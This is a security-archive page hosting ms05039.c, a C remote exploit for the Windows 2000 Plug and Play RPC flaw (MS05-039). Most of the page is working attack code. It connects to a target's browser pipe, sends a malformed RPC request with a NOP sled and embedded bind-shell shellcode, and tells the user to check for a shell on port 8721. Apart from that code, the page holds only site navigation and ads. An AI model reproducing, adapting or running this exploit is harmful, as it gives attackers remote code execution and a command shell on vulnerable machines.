what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ms05039.c

ms05039.c
Posted Aug 12, 2005

Microsoft Windows 2000 Plug and Play universal remote exploit for the flaw discussed in MS05-039.

tags | exploit, remote
systems | windows
advisories | CVE-2005-1983
SHA-256 | 781399405050c0988fddc2a8b8e492927b774aa17316460c4c494ff7b5f37391
Download | Favorite | View

ms05039.c

Change Mirror Download
/*
Windows 2000 universal exploit for MS05-039
-\x6d\x35\x6c\x30\x6e\x6e\x79-
*/

#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winnetwk.h>
#include <winsock.h>
#include <Rpc.h>
#include <wchar.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

BYTE Data1[0x68] = 
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,
 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00,
 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
struct DataStruct1
{
  BYTE SomeString[0x30];
  DWORD RESDataType;
  DWORD LFD;
  DWORD SDM1;
  DWORD SDO;
  DWORD SDL;
  DWORD SDM2;
  BYTE  SDA[0x07D0];
  DWORD LRD;
  DWORD MB;
  DWORD DM;
};
struct RPCBIND
{
  BYTE VerMaj;
  BYTE VerMin;
  BYTE PacketType;
  BYTE PacketFlags;
  DWORD DataRep; 
  WORD FragLength;
  WORD AuthLength;
  DWORD CallID;
  WORD MaxXmitFrag; 
  WORD MaxRecvFrag;
  DWORD AssocGroup;
  BYTE NumCtxItems;
  WORD ContextID;
  WORD NumTransItems;
  GUID InterfaceUUID;
  WORD InterfaceVerMaj;
  WORD InterfaceVerMin;
  GUID TransferSyntax;
  DWORD SyntaxVer;
};
//from metasploit, before you were born
BYTE 
BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x1
8\x8b\x45\x3c"
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53"
"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4"
"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9"
"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d"
"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51"
"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54"
"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff"
"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a"
"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55"
"\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c"
"\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10"
"\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c"
"\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49"
"\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff"
"\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3"
"\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55"
"\x04\x31\xdb\x53\xff\xd0"};
BYTE PRPC[0x48] =
{0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x
00,0x00,0x00,
 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x
00,0x01,0x00,
 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0x
D9,0x2E,0xF5,
 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0x
E8,0x08,0x00,
 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
struct RPCFUNC
{
  BYTE VerMaj;
  BYTE VerMin;
  BYTE PacketType;
  BYTE PacketFlags;
  DWORD DataRep;
  WORD FragLength;
  WORD AuthLength;
  DWORD CallID;
  DWORD AllocHint;
  WORD ContextID;
  WORD Opnum;
};
BYTE POP[0x27] = 
{0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x
00,0x00,0x00,
 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x
00,0x00,0x00,
 0x05,0x08,0x00,0x00,0x41,0x00,0x41};

int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
  BYTE rbuf[0x1000];
  DWORD dw;
  struct RPCBIND RPCBind;
  
  memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
  UuidFromString(Interface,&RPCBind.InterfaceUUID);
  UuidToString(&RPCBind.InterfaceUUID,&Interface);
  RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
  RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
  TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, 
sizeof(rbuf), &dw, NULL);
  return 0;
} 

int Attack(HANDLE PipeHandle)
{
  struct RPCFUNC RPCOP;
  int bwritten=0;
  BYTE *LargeBuffer;
  BYTE rbuf[0x100];
  DWORD dw;
  struct DataStruct1 EvilRPC;

  memcpy(&EvilRPC,&Data1,sizeof(EvilRPC));
  EvilRPC.SDL=0x07C0;
  memset(EvilRPC.SDA,0x90,0x07D0);
  EvilRPC.SDA[76]=0x3e;
  EvilRPC.SDA[77]=0x1e;
  EvilRPC.SDA[78]=0x02;
  EvilRPC.SDA[79]=0x75;
  memset(EvilRPC.SDA+80,0x90,10);
  EvilRPC.SDA[90]=0x90;
  memcpy(EvilRPC.SDA+94,BindShell,374);
  EvilRPC.MB=0x00000004;
  EvilRPC.DM=0x00000000;
  EvilRPC.LFD=0x000007E0;
  EvilRPC.LRD=0x000007E0;
  memcpy(&RPCOP,&POP,sizeof(RPCOP));
  RPCOP.Opnum = 54;
  RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC);
  RPCOP.AllocHint=sizeof(EvilRPC);
  LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC));
  memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC));
  memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP));
  memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC));
  printf("Sending payload...\nThis has to time out... ctrl+c after 5 
secs\ncheck for shell on port 8721");
  TransactNamedPipe(PipeHandle, LargeBuffer, 
sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL);
  free(LargeBuffer);
  return 0;
}


int main(int argc, char* argv[])
{
  char *server;
  NETRESOURCE nr;
  char unc[MAX_PATH];
  char szPipe[MAX_PATH];
  HANDLE hFile;

  if (argc < 2)
  {
    printf("Usage: %s <host>\n", argv[0]);
    return 1;
  }
  server=argv[1];
  _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
  unc[sizeof(unc)-1] = 0;
  nr.dwType       = RESOURCETYPE_ANY;
  nr.lpLocalName  = NULL;
  nr.lpRemoteName = unc;
  nr.lpProvider   = NULL;
  WNetAddConnection2(&nr, "", "", 0);

  _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server);
  hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, 
OPEN_EXISTING, 0, NULL);
  
BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-
08003e30051b","1.0");

  //SendMalformed RPC request
  Attack(hFile);
  return 0;
}



Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close